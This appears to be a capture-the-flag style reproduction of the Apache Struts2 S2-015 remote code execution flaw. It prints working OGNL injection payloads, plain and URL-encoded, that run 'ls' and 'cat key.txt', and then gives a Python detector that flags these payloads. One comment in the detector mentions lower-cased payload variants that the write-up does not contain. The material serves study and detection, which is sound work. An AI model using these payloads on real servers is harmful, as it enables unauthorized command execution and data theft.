Reproducing the Apache Struts2 Remote Code Execution Vulnerability (S2-015)

1. Request /${1+1}.action. The expression is evaluated, which confirms the vulnerability is present.

2. Write the exp (exploit expression)

${
#context['xwork.MethodAccessor.denyMethodExecution']=false,
#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),
#m.setAccessible(true),
#m.set(#_memberAccess,true),
#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('ls').getInputStream()),
#q
}.action

3. Execution fails; URL-encode the exp and submit it again

%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C
%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C
%23m.setAccessible%28true%29%2C
%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27ls%27%29.getInputStream%28%29%29%2C%23q%7D.action

4. Retrieve the key

%24%7B
%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C
%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C
%23m.setAccessible%28true%29%2C
%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

Payload

/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action

Decoded:

/${#context['xwork.MethodAccessor.denyMethodExecution']=false,#m=#_memberAccess.getClass().getDeclaredField('allowStaticMethodAccess'),#m.setAccessible(true),#m.set(#_memberAccess,true),#q=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('cat key.txt').getInputStream()),#q}.action
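From the defender's side, the same payload structure is what a WAF rule or log scan should look for. The check below is an added example, not part of the original writeup: it percent-decodes a request path (repeatedly, so double encoding does not hide the expression) and reports the S2-015 indicators it contains. The sample paths are constructed for this example; the second one is the URL-encoded payload shown above.

```python
import re
from urllib.parse import unquote

# Constructed sample request paths. The first two are the probe and the final
# payload from the writeup (URL-encoded as shown there); the last two are
# ordinary requests that must not be flagged.
SAMPLE_PATHS = [
    "/%24%7B1%2B1%7D.action",
    "/%24%7B%23context%5B%27xwork.MethodAccessor.denyMethodExecution%27%5D%3Dfalse%2C%23m%3D%23_memberAccess.getClass%28%29.getDeclaredField%28%27allowStaticMethodAccess%27%29%2C%23m.setAccessible%28true%29%2C%23m.set%28%23_memberAccess%2Ctrue%29%2C%23q%3D@org.apache.commons.io.IOUtils@toString%28@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20key.txt%27%29.getInputStream%28%29%29%2C%23q%7D.action",
    "/login.action?user=alice",
    "/orders/%7Bid%7D.action",
]

# An OGNL expression smuggled into the action name, in ${...} or %{...} form.
EXPRESSION_WRAPPER = re.compile(r"[$%]\{.*\}", re.DOTALL)

# Identifiers the payload needs to disable the OGNL sandbox and reach Runtime.exec.
INDICATORS = [
    "#_memberAccess",
    "denyMethodExecution",
    "allowStaticMethodAccess",
    "@java.lang.Runtime@",
    "getRuntime()",
    ".exec(",
]

def fully_decode(path: str, max_rounds: int = 5) -> str:
    """Percent-decode until the value stops changing, so a double-encoded
    payload is inspected in its final form rather than its outer layer."""
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path

def inspect_request_path(path: str) -> dict:
    """Decode one request path and list the S2-015 indicators it matches.
    Matching is case-insensitive: the lower-cased variants in the writeup would
    not execute, but they still mark an attempt worth alerting on."""
    decoded = fully_decode(path)
    hits = []
    if EXPRESSION_WRAPPER.search(decoded):
        hits.append("ognl_expression_in_action_name")
    hits += [ind for ind in INDICATORS if ind.lower() in decoded.lower()]
    return {"decoded": decoded, "indicators": hits, "suspicious": bool(hits)}

if __name__ == "__main__":
    for p in SAMPLE_PATHS:
        r = inspect_request_path(p)
        print("ALERT" if r["suspicious"] else "ok   ", r["indicators"], r["decoded"][:60])
```

The `${1+1}` probe from step 1 trips only the expression-wrapper check, so that single indicator is already enough to alert on; the full payload additionally matches every sandbox-bypass and command-execution identifier.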